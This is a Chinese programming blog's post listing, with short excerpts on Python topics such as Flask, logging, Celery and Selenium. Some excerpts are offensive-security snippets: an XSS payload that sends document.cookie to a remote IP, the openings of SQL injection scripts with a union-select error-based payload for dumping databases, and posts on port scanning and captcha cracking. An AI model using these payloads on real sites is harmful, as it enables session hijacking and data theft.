python
PD_3569
这个作者很懒,什么都没留下…
展开
-
sqlmapapi
之前一搞渗透的同事问我,sqlmapapi.py是干啥的,我猜很多人都玩过sqlmap,但玩过sqlmapapi的应该比较少,今天就和大家一起看看如何使用以及一些美的地方。说白了,sqlmapapi.py就是提供了一个检查sql注入的接口,我们可以直接通过发送http请求扫描sql注入,获取扫描结果等一系列操作。下面通过实例演示如何使用:一.启动服务器端服务器后端使用的是bottle,一个Pyth转载 2017-04-20 18:51:40 · 433 阅读 · 0 评论 -
python loggin模块
import logginglogging.basicConfig(level=logging.DEBUG, format='%(asctime)s %(filename)s[line:%(lineno)d] %(levelname)s %(message)s', datefmt='%a, %d %b %Y %H:原创 2017-07-02 09:48:02 · 416 阅读 · 0 评论 -
用python SSH模块登录,并在远程机执行shell命令
http://blog.sina.com.cn/s/blog_53d874320102vdvu.html用Python SSH模块登录,并在远程机执行shell命令(在CentOS 7 环境试验成功, Redhat 系列应该是兼容的。)先安装必须的模块# yum install python-dev# yum instal转载 2017-06-27 13:55:26 · 3020 阅读 · 0 评论 -
python 渗透库大集合
http://www.freebuf.com/sectool/138779.htmlNetwork(网络)l Scapy:一款强大的交互式数据报分析工具,可用作发送、嗅探、解析和伪造网络数据包。l pypcap、Pcapy和pylibpcap:配合libpcap一起使用的数据包捕获模块l libdnet:底层网络工具,含接口查询和以太网帧传输等功能转载 2017-07-06 13:19:35 · 3935 阅读 · 0 评论 -
portscan due to nmap
#coding : utf-8import sysimport nmapimport Queueimport threadingfrom optparse import OptionParserfrom IPy import IPclass portscan(): def __init__(self,sss): ips = [] self.ipQue原创 2017-10-06 14:44:31 · 451 阅读 · 0 评论 -
xss发送请求
var img=document.createElement("img");img.src="http://172.16.5.110:64321/?cao="+escape(document.cookie);document.body.appendChild(img);原创 2017-11-06 14:58:33 · 715 阅读 · 0 评论 -
python Flask-login
之前看别人的博客,感觉一阵头大,各种报错 然后看了看别人用flask-login的源码之后豁然开朗 … 测试了个简单的,记录下,有源码 看着就是容易理解 …#coding:utf-8from flask import Flask,request,redirect,flash,url_forfrom flask_login import LoginManager,login_user,logo原创 2017-11-21 15:27:56 · 864 阅读 · 0 评论 -
python raw_input or input With name 'abc' is not defined
>>> a = raw_input()asdasdwwhoami>>> a'asdasdwwhoami'>>> a = input()qweqweqweTraceback (most recent call last): File "", line 1, in File "", line 1, in NameError: name 'qweqweqwe' is not de原创 2017-12-11 11:21:01 · 345 阅读 · 0 评论 -
15分钟破解网站验证码
概述 http://www.bugcode.cn/break_captcha.html 很多开发者都讨厌网站的验证码,特别是写网络爬虫的程序员,而网站之所以设置验证码,是为了防止机器人访问网站,造成不必要的损失。现在好了,随着机器学习技术的发展,机器识别验证码的问题比较好解决了。样本采集工具 这里我们采用wordpress的Really Simple CAPTCH转载 2017-12-22 10:40:57 · 1500 阅读 · 0 评论 -
正则表达式 总览
字符说明\将下一字符标记为特殊字符、文本、反向引用或八进制转义符。例如,"n"匹配字符"n"。"\n"匹配换行符。序列"\\\\"匹配"\\","\\("匹配"("。^匹配输入字符串开始的位置。如果设置了 RegExp 对象的 Multiline 属性,^ 还会与"\n"或"\r"之后的位置匹配。$原创 2018-01-16 16:49:14 · 204 阅读 · 0 评论 -
Python进阶:聊聊IO密集型任务、计算密集型任务,以及多线程、多进程
https://zhuanlan.zhihu.com/p/24283040IO密集型任务 VS 计算密集型任务所谓IO密集型任务,是指磁盘IO、网络IO占主要的任务,计算量很小。比如请求网页、读写文件等。当然我们在Python中可以利用sleep达到IO密集型任务的目的。所谓计算密集型任务,是指CPU计算占主要的任务,CPU一直处于满负荷状态。比如在一个很大的列表中查找元素(当然这不合理),复杂的...转载 2018-05-05 17:16:31 · 10478 阅读 · 0 评论 -
Python时间,日期,时间戳之间转换
1.将字符串的时间转换为时间戳 方法: a = “2013-10-10 23:40:00” 将其转换为时间数组 importtime timeArray = time.strptime(a, “%Y-%m-%d %H:%M:%S”) 转换为时间戳: timeStamp = int(time.mktime(timeArray)) timeStamp == 13814196002.字符串转载 2017-04-19 20:07:51 · 671 阅读 · 0 评论 -
python将多个变量输入到文件
#!/usr/bin/env python head='auto_userone' name='Jordy' sex='male' hobby='girl'#*************方法一 def WriteToFileUsePrint(): with open('sample.txt', 'a+') as fd: p原创 2016-09-02 21:12:17 · 6465 阅读 · 0 评论 -
python 字符串
复制字符串strcpy(sStr1,sStr2)sStr1 = ‘strcpy’ sStr2 = sStr1 sStr1 = ‘strcpy2’ print sStr2连接字符串strcat(sStr1,sStr2)sStr1 = ‘strcat’ sStr2 = ‘append’ sStr1 += sStr2 print sStr1查找字符strchr(sStr1,sStr2)< 0转载 2016-08-30 21:09:16 · 218 阅读 · 0 评论 -
基于布尔注入的Python代码
基于布尔型注入,能够爆数据库,表,字段的Python代码#!/usr/bin/env python#coding=utf-8import sysimport requestsimport reimport binasciidef http_get(url): return requests.get(url) passdef dichotomy(sql): #二分法原创 2016-06-25 19:18:05 · 1284 阅读 · 0 评论 -
基于报错注入的Python代码
能够爆数据库,表,和字段的 简单的报错注入的Python代码import reimport sysimport requestsimport binasciidef Get_db(url): url_dbs_num = url + "?id=' union select 1 from (select count(*),concat(floor(rand(0)*2),0x3a3a3a,原创 2016-06-25 19:09:20 · 961 阅读 · 0 评论 -
python识别验证码并登录
尝试练习python,苦于没有什么想写……百度得知,pytesseract库识别验证码还可以,尝试利用结果: 识别验证码效果不理想,获取十张验证码能够准确识别一张的概率,加上自己对验证码的处理效果会稍微提高些环境: Tesseract OCR engine 安装PIL pytesseract第一步: 获取当前原创 2017-01-15 18:29:55 · 3728 阅读 · 0 评论 -
python OptionParser 命令行参数解析库
一直都很疑惑,别人怎么写命令行参数的时候怎么解析,自己写很麻烦欸,直到发现了这个库,简单记录查找方便from optparse import OptionParser def cmdParse(): parser = OptionParser() parser.add_option("-f",dest="dicPath",default=False,help="dict file p原创 2017-01-15 19:26:02 · 1396 阅读 · 0 评论 -
验证码识别续
目的: 之前识别 成功率太感人… 想着这一段起码写出来点东西吧 ,比如把之前的完善下 … 我学长写过一个成功率 90 的,我问问他然后把我的看看多少弥补点 … 提升下吧 …构思: 学长说他的复杂,他是 openCV 处理 ,然后使用SVM 机器学习来识别,我之前的是利用 google 的 ORC 直接识别 最后成果是 ,使用 openCV 处理原创 2017-02-09 15:42:49 · 453 阅读 · 0 评论 -
python中flask 常见问题
1、改变默认的本地路径可以在创建应用对象时使用关键字参数static_folder改变 默认的静态文件夹。例如,你的静态文件都存放在应用下的assets目录下, 那么可以按如下的方式创建应用对象:app = Flask(__name__,static_folder='assets',template_folder='template')也可以使用一个绝对路径:app = Flask转载 2017-04-09 10:06:03 · 5569 阅读 · 0 评论 -
异步任务神器 Celery
Celery在程序的运行过程中,我们经常会碰到一些耗时耗资源的操作,为了避免它们阻塞主程序的运行,我们经常会采用多线程或异步任务。比如,在 Web 开发中,对新用户的注册,我们通常会给他发一封激活邮件,而发邮件是个 IO 阻塞式任务,如果直接把它放到应用当中,就需要等邮件发出去之后才能进行下一步操作,此时用户只能等待再等待。更好的方式是在业务逻辑中触发一个发邮件的异步任务,而主程序可以继续转载 2017-04-10 21:23:05 · 480 阅读 · 0 评论 -
Python爬虫利器五之Selenium的用法
前言在上一节我们学习了 PhantomJS 的基本用法,归根结底它是一个没有界面的浏览器,而且运行的是 JavaScript 脚本,然而这就能写爬虫了吗?这又和Python有什么关系?说好的Python爬虫呢?库都学完了你给我看这个?客官别急,接下来我们介绍的这个工具,统统解决掉你的疑惑。简介Selenium 是什么?一句话,自动化测试工具。它支持各种浏览器,包括 Chro转载 2017-04-11 15:12:51 · 389 阅读 · 0 评论 -
Selenium常用函数
http://www.jianshu.com/p/147744c50020转载 2017-04-11 20:22:57 · 838 阅读 · 0 评论 -
python import上级路径文件
- web.py- conn.py- xss--- xss.py - sql--- sql.pyxss.pydef xss(): print "tesing xss"sql.pydef sql(): print "tesing sql"conn.py def conn(): print "connect mysql"w原创 2017-04-11 21:03:39 · 1011 阅读 · 0 评论 -
Python [2 | 3] 协程使用
https://thief.one/2017/02/20/Python%E5%8D%8F%E7%A8%8B/上篇论述了关于python多线程是否是鸡肋的问题,得到了一些网友的认可,当然也有一些不同意见,表示协程比多线程不知强多少,在协程面前多线程算是鸡肋。好吧,对此我也表示赞同,然而上篇我论述的观点不在于多线程与协程的比较,而是在于IO密集型程序中,多线程尚有用武之地。 对于协程,我表示其效率确...原创 2018-05-05 17:23:50 · 1030 阅读 · 0 评论